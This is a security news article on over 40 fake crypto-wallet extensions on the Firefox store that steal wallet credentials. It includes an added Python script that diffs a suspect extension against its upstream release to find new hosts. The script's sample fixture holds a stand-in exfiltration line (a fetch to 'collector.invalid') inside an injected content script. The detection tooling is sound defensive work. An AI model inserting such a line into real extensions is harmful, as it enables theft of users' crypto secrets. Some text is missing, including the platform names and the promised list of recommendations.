Fake Wallet Extensions on Firefox Store Targeting Crypto Users
There’s new malware in the Web3 world that is targeting crypto users through fake Firefox extensions, and the threat is far from over. Ronen of Koi Security, in his latest Medium post, has revealed that there’s a large-scale, ongoing operation involving over 40 malicious Firefox extensions that impersonate popular cryptocurrency wallet tools. Obviously, the aim is to steal users’ private wallet credentials and exfiltrate them to remote attacker-controlled servers, leaving crypto assets wide open to theft.
As always, the malicious extensions were designed to mimic official wallets from major platforms like and more. Interestingly, they used real branding, logos, and even open-source code from the legitimate tools they impersonated. The result was a convincing trap: fully functional extensions that quietly looted user secrets behind the scenes.
What makes this campaign particularly dangerous is how deeply it has embedded itself in trusted spaces. These fake extensions weren’t lurking in sketchy corners of the internet; they were live on Mozilla’s official Firefox Add-ons store, complete with glowing reviews and inflated ratings to boost credibility.
In fact, many had hundreds of 5-star reviews, carefully crafted to fake popularity and trust. According to Ronen, the campaign has been active since at least April 2025, with some extensions uploaded as recently as last week. The persistence of uploads suggests that the threat actors are actively maintaining and evolving the campaign even now.
The extensions are engineered to extract wallet credentials directly from targeted web pages and send them to a remote server. They also transmit the victim’s external IP address, likely for profiling or geographic targeting.
While attribution is not definitive, early clues point to a Russian-speaking threat actor. Researchers discovered Russian-language comments in the code, as well as suspicious metadata linked to Russian-language files found on associated servers.
The attackers’ tactics also hint at a level of operational discipline: low-effort cloning of open-source code, selective insertion of malicious logic, and continued use of the Mozilla store’s trust systems to evade detection.
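Because the extensions are clones of open-source wallets with malicious logic selectively inserted, comparing a suspect package against the legitimate upstream release isolates exactly what was changed. The following Python is an added example, not code from Koi Security or the original post; the function names are hypothetical, and the file trees and host names are constructed for illustration.

```python
import re
from pathlib import Path

# Host part of any http(s) URL found in a file's text.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def load_tree(root) -> dict:
    """Read an unpacked extension directory into {relative_path: bytes}."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_bytes()
            for p in root.rglob("*") if p.is_file()}

def diff_against_upstream(upstream: dict, suspect: dict) -> dict:
    """List files the suspect build added or changed relative to upstream."""
    added = sorted(p for p in suspect if p not in upstream)
    modified = sorted(p for p in suspect
                      if p in upstream and suspect[p] != upstream[p])
    return {"added": added, "modified": modified}

def new_hosts(upstream: dict, suspect: dict) -> dict:
    """Hosts referenced in added/modified files that appear nowhere upstream."""
    known = set()
    for data in upstream.values():
        known.update(URL_RE.findall(data.decode("utf-8", "replace")))
    delta = diff_against_upstream(upstream, suspect)
    findings = {}
    for path in delta["added"] + delta["modified"]:
        text = suspect[path].decode("utf-8", "replace")
        hosts = set(URL_RE.findall(text)) - known
        if hosts:
            findings[path] = sorted(hosts)
    return findings

# Constructed sample trees: a legitimate release and a clone with one
# inserted content script and a widened permission list.
UPSTREAM = {
    "manifest.json": b'{"name": "Example Wallet", "permissions": ["storage"]}',
    "background.js": b'const RPC = "https://rpc.wallet.example/v1";\n',
    "popup.js": b'document.getElementById("unlock").onclick = unlock;\n',
}
SUSPECT = dict(UPSTREAM)
SUSPECT["manifest.json"] = (
    b'{"name": "Example Wallet", "permissions": ["storage", "<all_urls>"]}')
SUSPECT["content.js"] = b'fetch("https://collector.invalid/log", opts);\n'

if __name__ == "__main__":
    print(diff_against_upstream(UPSTREAM, SUSPECT))
    print(new_hosts(UPSTREAM, SUSPECT))
```

For real packages, pass two unpacked directories through `load_tree` and review every added or modified file by hand; a new host is a lead for that review, not a verdict.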
With such threats hiding in plain sight, Ronen and his team at Koi Security recommend treating browser extensions with the same caution as full-fledged software:
As the browser becomes an increasingly critical attack vector, especially for crypto users, the old habit of blindly trusting extensions is proving costly. The hope, Ronen says, is that greater awareness and better tooling will mark the beginning of the end for ungoverned third-party code.